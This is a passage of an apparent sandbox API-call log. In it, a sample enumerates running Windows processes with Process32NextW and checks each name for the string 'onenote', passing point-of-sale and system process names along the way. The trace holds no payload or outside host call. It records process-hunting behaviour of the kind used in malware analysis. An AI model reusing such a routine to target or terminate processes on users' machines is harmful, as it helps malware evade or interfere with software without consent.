returned 18 [0098.106] lstrcpyA (in: lpString1=0x567fabc, lpString2="creditservice.exe" | out: lpString1="creditservice.exe") returned="creditservice.exe" [0098.106] StrStrIA (lpFirst="creditservice.exe", lpSrch="onenote") returned 0x0 [0098.106] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0098.107] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0098.107] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3579ff8 [0098.107] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x3579ff8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="edcsvr.exe", lpUsedDefaultChar=0x0) returned 11 [0098.107] lstrcpyA (in: lpString1=0x567fabc, lpString2="edcsvr.exe" | out: lpString1="edcsvr.exe") returned="edcsvr.exe" [0098.107] StrStrIA (lpFirst="edcsvr.exe", lpSrch="onenote") returned 0x0 [0098.107] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0098.108] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0098.108] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x357a040 [0098.108] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x357a040, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fpos.exe", lpUsedDefaultChar=0x0) returned 9 [0098.108] lstrcpyA (in: lpString1=0x567fabc, lpString2="fpos.exe" | out: lpString1="fpos.exe") returned="fpos.exe" [0098.108] StrStrIA (lpFirst="fpos.exe", lpSrch="onenote") returned 0x0 [0098.109] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0098.110] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0098.110] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x357a028 [0098.110] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x357a028, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="isspos.exe", lpUsedDefaultChar=0x0) returned 11 [0098.110] lstrcpyA (in: lpString1=0x567fabc, lpString2="isspos.exe" | out: lpString1="isspos.exe") returned="isspos.exe" [0098.110] StrStrIA (lpFirst="isspos.exe", lpSrch="onenote") returned 0x0 [0098.110] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0098.111] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0098.111] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x357adf8 [0098.111] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x357adf8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mxslipstream.exe", lpUsedDefaultChar=0x0) returned 17 [0098.111] lstrcpyA (in: lpString1=0x567fabc, lpString2="mxslipstream.exe" | out: lpString1="mxslipstream.exe") returned="mxslipstream.exe" [0098.111] StrStrIA (lpFirst="mxslipstream.exe", lpSrch="onenote") returned 0x0 [0098.111] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0098.132] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.132] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3579ef0 [0098.132] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x3579ef0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="omnipos.exe", lpUsedDefaultChar=0x0) returned 12 [0098.132] lstrcpyA (in: lpString1=0x567fabc, lpString2="omnipos.exe" | out: lpString1="omnipos.exe") returned="omnipos.exe" [0098.132] StrStrIA (lpFirst="omnipos.exe", lpSrch="onenote") returned 0x0 [0098.132] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0098.133] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0098.133] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3579f50 [0098.133] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x3579f50, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spcwin.exe", lpUsedDefaultChar=0x0) returned 11 [0098.134] lstrcpyA (in: lpString1=0x567fabc, lpString2="spcwin.exe" | out: lpString1="spcwin.exe") returned="spcwin.exe" [0098.134] StrStrIA (lpFirst="spcwin.exe", lpSrch="onenote") returned 0x0 [0098.134] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0098.135] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0098.135] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x357acb8 [0098.135] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x357acb8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spgagentservice.exe", lpUsedDefaultChar=0x0) returned 20 [0098.135] lstrcpyA (in: lpString1=0x567fabc, lpString2="spgagentservice.exe" | out: lpString1="spgagentservice.exe") returned="spgagentservice.exe" [0098.135] StrStrIA (lpFirst="spgagentservice.exe", lpSrch="onenote") returned 0x0 [0098.135] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0098.136] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0098.136] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x35780d8 [0098.136] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x35780d8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="utg2.exe", lpUsedDefaultChar=0x0) returned 9 [0098.136] lstrcpyA (in: lpString1=0x567fabc, lpString2="utg2.exe" | out: lpString1="utg2.exe") returned="utg2.exe" [0098.136] StrStrIA (lpFirst="utg2.exe", lpSrch="onenote") returned 0x0 [0098.136] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="saying.exe")) returned 1 [0098.137] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0098.138] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3578378 [0098.138] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x3578378, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="saying.exe", lpUsedDefaultChar=0x0) returned 11 [0098.138] lstrcpyA (in: lpString1=0x567fabc, lpString2="saying.exe" | out: lpString1="saying.exe") returned="saying.exe" [0098.138] StrStrIA (lpFirst="saying.exe", lpSrch="onenote") returned 0x0 [0098.138] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ripe.exe")) returned 1 [0098.139] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0098.139] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3578120 [0098.139] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x3578120, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ripe.exe", lpUsedDefaultChar=0x0) returned 9 [0098.139] lstrcpyA (in: lpString1=0x567fabc, lpString2="ripe.exe" | out: lpString1="ripe.exe") returned="ripe.exe" [0098.139] StrStrIA (lpFirst="ripe.exe", lpSrch="onenote") returned 0x0 [0098.139] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="acoustic.exe")) returned 1 [0098.140] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0098.140] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3578390 [0098.140] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x3578390, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="acoustic.exe", lpUsedDefaultChar=0x0) returned 13 [0098.140] lstrcpyA (in: lpString1=0x567fabc, lpString2="acoustic.exe" | out: lpString1="acoustic.exe") returned="acoustic.exe" [0098.140] StrStrIA (lpFirst="acoustic.exe", lpSrch="onenote") returned 0x0 [0098.141] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mail.exe")) returned 1 [0098.142] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0098.142] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3578168 [0098.142] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x3578168, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mail.exe", lpUsedDefaultChar=0x0) returned 9 [0098.142] lstrcpyA (in: lpString1=0x567fabc, lpString2="mail.exe" | out: lpString1="mail.exe") returned="mail.exe" [0098.142] StrStrIA (lpFirst="mail.exe", lpSrch="onenote") returned 0x0 [0098.142] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0098.143] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0098.143] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35780f0 [0098.143] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x35780f0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0098.143] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0098.143] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="onenote") returned 0x0 [0098.144] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0098.145] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.145] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35782d0 [0098.145] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35782d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0098.145] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0098.145] StrStrIA (lpFirst="svchost.exe", lpSrch="onenote") returned 0x0 [0098.145] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0098.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.146] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3578258 [0098.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x3578258, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 12 [0098.146] lstrcpyA (in: lpString1=0x567fabc, lpString2="dllhost.exe" | out: lpString1="dllhost.exe") returned="dllhost.exe" [0098.146] StrStrIA (lpFirst="dllhost.exe", lpSrch="onenote") returned 0x0 [0098.147] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1208, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0098.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0098.148] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3578318 [0098.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x3578318, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0098.148] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0098.148] StrStrIA (lpFirst="taskhostw.exe", lpSrch="onenote") returned 0x0 [0098.148] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0098.149] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0098.149] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3578330 [0098.149] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x3578330, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UsoClient.exe", lpUsedDefaultChar=0x0) returned 14 [0098.149] lstrcpyA (in: lpString1=0x567fabc, lpString2="UsoClient.exe" | out: lpString1="UsoClient.exe") returned="UsoClient.exe" [0098.149] StrStrIA (lpFirst="UsoClient.exe", lpSrch="onenote") returned 0x0 [0098.149] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0098.151] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0098.151] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3578150 [0098.151] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x3578150, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0098.151] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0098.151] StrStrIA (lpFirst="taskhostw.exe", lpSrch="onenote") returned 0x0 [0098.151] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0098.152] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0098.152] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x357ae18 [0098.152] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x357ae18, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UNPCampaignManager.exe", lpUsedDefaultChar=0x0) returned 23 [0098.152] lstrcpyA (in: lpString1=0x567fabc, lpString2="UNPCampaignManager.exe" | out: lpString1="UNPCampaignManager.exe") returned="UNPCampaignManager.exe" [0098.152] StrStrIA (lpFirst="UNPCampaignManager.exe", lpSrch="onenote") returned 0x0 [0098.152] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x122c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0098.153] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0098.153] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x357aef8 [0098.153] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x357aef8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DeviceCensus.exe", lpUsedDefaultChar=0x0) returned 17 [0098.153] lstrcpyA (in: lpString1=0x567fabc, lpString2="DeviceCensus.exe" | out: lpString1="DeviceCensus.exe") returned="DeviceCensus.exe" [0098.154] StrStrIA (lpFirst="DeviceCensus.exe", lpSrch="onenote") returned 0x0 [0098.154] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0098.155] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0098.155] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x356b528 [0098.155] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x356b528, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppHostRegistrationVerifier.exe", lpUsedDefaultChar=0x0) returned 32 [0098.155] lstrcpyA (in: lpString1=0x567fabc, lpString2="AppHostRegistrationVerifier.exe" | out: lpString1="AppHostRegistrationVerifier.exe") returned="AppHostRegistrationVerifier.exe" [0098.155] StrStrIA (lpFirst="AppHostRegistrationVerifier.exe", lpSrch="onenote") returned 0x0 [0098.155] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x122c, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0098.156] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.156] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35780c0 [0098.156] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x35780c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0098.156] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0098.156] StrStrIA (lpFirst="conhost.exe", lpSrch="onenote") returned 0x0 [0098.156] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1210, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0098.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.158] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3578228 [0098.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x3578228, cbMultiByte=12, 